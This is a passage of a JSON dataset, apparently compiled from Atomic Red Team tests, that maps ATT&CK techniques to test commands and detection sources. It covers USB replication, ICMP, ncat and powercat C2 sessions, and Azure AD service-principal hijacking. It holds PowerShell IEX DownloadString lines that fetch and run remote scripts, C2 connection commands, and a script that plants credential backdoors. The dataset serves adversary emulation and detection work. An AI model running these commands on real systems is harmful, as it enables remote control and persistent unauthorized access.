\"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path 
$Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n", + "source": "atomics/T1091/T1091.yaml", + "name": "Atomic Red Team Test - Replication Through Removable Media" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1091", + "display_name": "Replication Through Removable Media", + "atomic_tests": [ + { + "name": "USB Malware Spread Simulation", + "auto_generated_guid": "d44b7297-622c-4be8-ad88-ec40d7563c75", + "description": "Simulates an adversary copying malware to all connected removable drives. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path $Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n", + "cleanup_command": "$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nRemove-Item -Path $Drive\\T1091Test1.txt -Force -ErrorAction Ignore\n}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "219", + " 421", + " 4657", + "USB/PnP - IDs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + [ + "4657", + "USB/PnP - IDs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://www.justice.gov/file/1080281/download", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1095", + "command_list": [ + "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n", + null, + "cmd /c $env:TEMP\\T1095\\nmap-7.80\\ncat.exe #{server_ip} #{server_port}\n", + "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "cmd /c #{ncat_exe} 127.0.0.1 #{server_port}\n", + "IEX (New-Object 
System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p #{server_port}\n" + ], + "commands": [ + { + "command": "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": null, + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c $env:TEMP\\T1095\\nmap-7.80\\ncat.exe #{server_ip} #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c #{ncat_exe} 127.0.0.1 #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1095", + "display_name": "Non-Application Layer Protocol", + "atomic_tests": [ + { + "name": "ICMP C2", + "auto_generated_guid": "0268e63c-e244-42db-bef7-72a9e59fc1fc", + "description": "This will attempt to start C2 Session Using ICMP. 
For information on how to set up the listener\nrefer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "The IP address of the listening server", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress #{server_ip}\n", + "name": "powershell" + } + }, + { + "name": "Netcat C2", + "auto_generated_guid": "bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37", + "description": "Start C2 Session Using Ncat\nTo start the listener on a Linux device, type the following: \nnc -l -p \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_port": { + "description": "The port for the C2 connection", + "type": "Integer", + "default": 80 + }, + "ncat_exe": { + "description": "The location of ncat.exe", + "type": "Path", + "default": "$env:TEMP\\T1095\\nmap-7.80\\ncat.exe" + }, + "ncat_path": { + "description": "The folder path of ncat.exe", + "type": "Path", + "default": "$env:TEMP\\T1095" + }, + "server_ip": { + "description": "The IP address or domain name of the listening server", + "type": "String", + "default": "127.0.0.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ncat.exe must be available at specified location (#{ncat_exe})\n", + "prereq_command": "if( Test-Path \"#{ncat_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null\n$parentpath = Split-Path (Split-Path \"#{ncat_exe}\"); $zippath = \"$parentpath\\nmap.zip\"\nInvoke-WebRequest \"https://nmap.org/dist/nmap-7.80-win32.zip\" -OutFile 
\"$zippath\"\n Expand-Archive $zippath $parentpath -Force\n $unzipPath = Join-Path $parentPath \"nmap-7.80\"\nif( $null -eq (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | ?{$_.DisplayName -like \"Microsoft Visual C++*\"}) ) {\n Start-Process (Join-Path $unzipPath \"vcredist_x86.exe\")\n}\n" + } + ], + "executor": { + "command": "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "name": "powershell" + } + }, + { + "name": "Powercat C2", + "auto_generated_guid": "3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e", + "description": "Start C2 Session Using Powercat\nTo start the listener on a Linux device, type the following: \nnc -l -p \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "The IP address or domain name of the listening server", + "type": "String", + "default": "127.0.0.1" + }, + "server_port": { + "description": "The port for the C2 connection", + "type": "Integer", + "default": 80 + } + }, + "executor": { + "command": "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c #{server_ip} -p #{server_port}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + null + ] + }, + { + "technique_id": "T1098.001", + "command_list": [ + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"SuperSP\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperSP.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperSP.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
